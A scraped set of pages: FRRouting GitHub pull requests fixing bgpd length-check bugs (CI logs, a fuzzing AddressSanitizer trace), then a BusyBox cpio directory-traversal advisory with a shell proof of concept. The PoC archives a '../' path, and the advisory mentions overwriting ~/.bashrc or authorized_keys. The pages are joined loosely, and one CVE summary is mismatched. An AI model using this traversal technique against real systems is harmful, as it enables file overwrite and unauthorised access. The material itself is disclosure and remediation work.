*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Addresssanitizer topotests part 0
*   Debian 10 deb pkg check
*   Topotests debian 10 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 4
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 3
*   Addresssanitizer topotests part 1
*   Topotests debian 10 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 8
*   Addresssanitizer topotests part 7
*   Static analyzer (clang)
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 5
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 i386 part 1

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Failed**Topotests Ubuntu 18.04 arm8 part 6: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 6: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO6U18ARM8/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 6: No useful log found Topotests Ubuntu 18.04 arm8 part 8: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 8: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO8U18AMD64/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 8: No useful log found Topotests Ubuntu 18.04 arm8 part 9: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 9: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18ARM8/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 9: No useful log found Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13630/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests debian 10 amd64 part 6
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 i386 part 5
*   Addresssanitizer topotests part 2
*   Topotests debian 10 amd64 part 5
*   Topotests Ubuntu 18.04 arm8 part 2
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 3
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 i386 part 2
*   Ubuntu 18.04 deb pkg check
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Addresssanitizer topotests part 0
*   Debian 10 deb pkg check
*   Topotests debian 10 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 4
*   Addresssanitizer topotests part 4
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 3
*   Addresssanitizer topotests part 1
*   Topotests debian 10 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 8
*   Addresssanitizer topotests part 7
*   Static analyzer (clang)
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 5
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 i386 part 1

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13644/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 i386 part 6
*   Addresssanitizer topotests part 2
*   Topotests Ubuntu 18.04 amd64 part 5
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 i386 part 1
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 arm8 part 2
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests debian 10 amd64 part 5
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 8
*   Addresssanitizer topotests part 7
*   Topotests Ubuntu 18.04 i386 part 0
*   Topotests debian 10 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 7
*   Addresssanitizer topotests part 6
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 i386 part 5
*   Ubuntu 20.04 deb pkg check
*   Ubuntu 18.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 9
*   Debian 10 deb pkg check
*   Debian 9 deb pkg check
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 i386 part 8
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 5
*   Addresssanitizer topotests part 5
*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 1
*   Topotests debian 10 amd64 part 4
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 amd64 part 8
*   Topotests debian 10 amd64 part 3
*   Addresssanitizer topotests part 0
*   Static analyzer (clang)

Continuous Integration Result: SUCCESSFUL**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13644/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

… AIGP

Found when fuzzing:

\`\`\`
==3470861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff77801ef7 at pc 0xaaaaba7b3dbc bp 0xffffcff0e760 sp 0xffffcff0df50
READ of size 2 at 0xffff77801ef7 thread T0
    0 0xaaaaba7b3db8 in \_\_asan\_memcpy (/home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgpd+0x363db8) (BuildId: cc710a2356e31c7f4e4a17595b54de82145a6e21)
    1 0xaaaaba81a8ac in ptr\_get\_be16 /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/./lib/stream.h:399:2
    2 0xaaaaba819f2c in bgp\_attr\_aigp\_valid /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgp\_attr.c:504:3
    3 0xaaaaba808c20 in bgp\_attr\_aigp /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgp\_attr.c:3275:7
    4 0xaaaaba7ff4e0 in bgp\_attr\_parse /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgp\_attr.c:3678:10
\`\`\`

Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Topotests Ubuntu 18.04 i386 part 1: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO1U18I386-13677/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 1**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO1U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 1: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO1U18I386/TopotestDetails/

Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13677/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests debian 10 amd64 part 8
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 4
*   Addresssanitizer topotests part 2
*   Topotests Ubuntu 18.04 arm8 part 9
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 5
*   Topotests Ubuntu 18.04 i386 part 6
*   Debian 10 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 4
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests debian 10 amd64 part 0
*   Addresssanitizer topotests part 7
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   Topotests debian 10 amd64 part 2
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 amd64 part 8
*   Topotests Ubuntu 18.04 amd64 part 0
*   Static analyzer (clang)
*   Topotests Ubuntu 18.04 i386 part 5
*   Ubuntu 18.04 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Debian 9 deb pkg check
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 arm8 part 6
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8

**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

 ton31337 deleted the fix/aigp\_validation\_bytes branch

August 24, 2023 11:44

This was referenced

Aug 24, 2023

donaldsharp added a commit that referenced this pull request

Aug 24, 2023

bgpd: Make sure we have enough data to read two bytes when validating AIGP (backport #14232)

donaldsharp added a commit that referenced this pull request

Aug 24, 2023

bgpd: Make sure we have enough data to read two bytes when validating AIGP (backport #14232)

CVE-2023-41359: bgpd: Make sure we have enough data to read two bytes when validating AIGP by ton31337 · Pull Request #14232 · FRRouting/frr

An issue was discovered in FRRouting FRR 9.0. bgpd/bgp_open.c does not check for an overly large length of the rcv software version.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Merged

donaldsharp merged 1 commit into FRRouting:master from opensourcerouting:fix/software\_version\_capability\_handling\_len

Aug 21, 2023

Merged

**bgpd: Check the length of the rcv software version #14241**

donaldsharp merged 1 commit into FRRouting:master from opensourcerouting:fix/software\_version\_capability\_handling\_len

Aug 21, 2023

+11 −1

Conversation 6 Commits 1 Checks 5 Files changed 1

**Conversation**

Copy link

Member

**

 **ton31337** commented

Aug 20, 2023

**

Make sure we don't exceed the maximum of BGP\_MAX\_SOFT\_VERSION.

The Capability Length SHOULD be no greater than 64.

Reported-by: Iggy Frankovic iggyfran@amazon.com

 frrbot bot added the bgp label

Aug 20, 2023

 github-actions bot added master size/XS labels

Aug 20, 2023

 ton31337 force-pushed the fix/software\_version\_capability\_handling\_len branch from 4ab7b68 to 5e3a269 Compare

August 20, 2023 18:47

 github-actions bot added size/S and removed size/XS labels

Aug 20, 2023

          bgpd: Check the length of the rcv software version
        

          b4d09af
        

Make sure we don't exceed the maximum of BGP\_MAX\_SOFT\_VERSION.

The Capability Length SHOULD be no greater than 64.

Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>

 ton31337 force-pushed the fix/software\_version\_capability\_handling\_len branch from 5e3a269 to b4d09af Compare

August 20, 2023 18:48

Copy link

Member Author

**

**ton31337** commented

Aug 20, 2023

**

@Mergifyio backport stable/9.0

mergify\[bot\] reacted with thumbs up emoji

Copy link

**

**mergify bot** commented

Aug 20, 2023

•

edited



**

> backport stable/9.0

**✅ Backports have been created**

*   #14250 bgpd: Check the length of the rcv software version (backport #14241) has been created for branch stable/9.0

 github-actions bot added the backport label

Aug 20, 2023

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13678/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 arm8 part 9
*   Addresssanitizer topotests part 2
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 6
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 amd64 part 7
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 3
*   Addresssanitizer topotests part 7
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 arm8 part 5
*   Topotests debian 10 amd64 part 1
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests Ubuntu 18.04 amd64 part 8
*   Topotests debian 10 amd64 part 2
*   Static analyzer (clang)
*   Topotests Ubuntu 18.04 i386 part 5
*   Ubuntu 18.04 deb pkg check
*   Debian 9 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8
*   Topotests Ubuntu 18.04 amd64 part 6

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13679/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 8
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 arm8 part 9
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 amd64 part 4
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Addresssanitizer topotests part 3
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 7
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 7
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 i386 part 0
*   Topotests Ubuntu 18.04 i386 part 5
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   CentOS 7 rpm pkg check
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 8
*   Static analyzer (clang)
*   Addresssanitizer topotests part 2
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests debian 10 amd64 part 5
*   Ubuntu 18.04 deb pkg check
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 arm8 part 6
*   Addresssanitizer topotests part 8
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Topotests Ubuntu 18.04 i386 part 3: Failed (click for details) Topotests Ubuntu 18.04 i386 part 3: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO3U18I386/TopotestDetails/

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO3U18I386-13680/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 3**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO3U18I386/TopotestLogs/log\_topotests.txt

Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13680/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Addresssanitizer topotests part 0
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 9
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 amd64 part 8
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 7
*   Topotests Ubuntu 18.04 amd64 part 7
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 i386 part 5
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 3
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   CentOS 7 rpm pkg check
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests debian 10 amd64 part 2
*   Addresssanitizer topotests part 2
*   Static analyzer (clang)
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 1
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Ubuntu 18.04 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 arm8 part 6
*   Addresssanitizer topotests part 8
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 amd64 part 6

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 21, 2023

**

**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

 donaldsharp merged commit ff4c767 into FRRouting:master

Aug 21, 2023

6 checks passed

 mergify bot mentioned this pull request

Aug 21, 2023

bgpd: Check the length of the rcv software version (backport #14241) #14250

Merged

 ton31337 deleted the fix/software\_version\_capability\_handling\_len branch

August 21, 2023 13:53

donaldsharp added a commit that referenced this pull request

Aug 21, 2023

          Merge pull request #14250 from FRRouting/mergify/bp/stable/9.0/pr-14241
        

          d8238e9
        

bgpd: Check the length of the rcv software version (backport #14241)

Sign up for free **to join this conversation on GitHub**. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

backport bgp master size/S

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

None yet

3 participants

CVE-2023-41361: bgpd: Check the length of the rcv software version by ton31337 · Pull Request #14241 · FRRouting/frr

An issue in the CPIO command of Busybox v1.33.2 allows attackers to execute a directory traversal.

When extracting cpio archives with BusyBox cpio, the cpio archiving tools may write files outside the destination directory and there is no option to prevent this.

**Summary**

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L, **6.1 Medium**

cpio is an archive format and also an archive handling tool. Several implementations exist, for example GNU cpio, bsdcpio, and BusyBox cpio. The BusyBox variant of cpio has been found to extract archives that contain relative file names starting with ../ and this cannot be prevented.

While bsdcpio ignores archived files that have absolut file names or start with ../ and GNU cpio has a parameter to prevent extracting these file names, BusyBox processes archives with such names and there is no parameter to handle potentially untrusted archives.

**Impact**

If untrusted archives are extracted, this may result in writing files outside the destination directory. This could result in files being overwritten that contain configuration in form of shell scripts such as ~/.bashrc or that enable a login from a remote side such as the ~/.ssh/authorized_keys file.

**Timeline**

*   2023-07-24: Vulnerability noticed.
    
*   2023-07-26: Initial contact of BusyBox maintainer via e-mail.
    
*   2023-08-01: Second try to contact BusyBox maintainer via e-mail. First try to contact developer of the module, but e-mail bounced. First contact to Debian security team, because BusyBox package is available via Debian packages.
    
*   2023-08-24: CVE-2023-39810 was assigned.
    
*   2023-08-28: Advisory published after not being able to get in contact with maintainer or developer.
    

**Affected Components**

The issue affects BusyBox cpio in multiple versions on different platforms. Pentagrid tested the following versions and could successfully reproduce the issue.

*   BusyBox v1.33.2
    
*   BusyBox v1.30.1
    

**Technical Details**

The processing of relative and absolute file names could result in risks. For example the GNU cpio program was affected by the same vulnerability, referenced as "CVE-2005-1229 - Directory traversal vulnerability in cpio 2.6 and earlier allows remote attackers to write to arbitrary directories via a .. (dot dot) in a cpio file." A patch was developed and added to cpio 2.6-6, which requires an additional parameter --no-absolute-filenames to prevent files being overwritten. This option also works for relative file names. This is still an insecure default, but an improvement.

BusyBox cpio is another implementation, but it has no similar mechanism to avoid the processing of relative files as shown with the proof of concept below:

#!/bin/sh
set -e
echo + Clean-up
rm -rf /tmp/testcase
echo + Create a test archive
mkdir -p /tmp/testcase/a/b/
echo test > /tmp/testcase/testfile
cd /tmp/testcase/a/b/
(echo ../../testfile; echo /etc/hostname) | cpio -ov -H newc -O /tmp/testcase/a/b/archive.cpio --quiet
rm /tmp/testcase/testfile
echo + Extract archive
mkdir /tmp/testcase/a/b/etc
strace -f busybox cpio -iv < archive.cpio 2>&1 | grep 'hostname\\|testfile' | grep -v read
echo + List files
find /tmp/testcase/

The final find command lists extracted files:

/tmp/testcase/
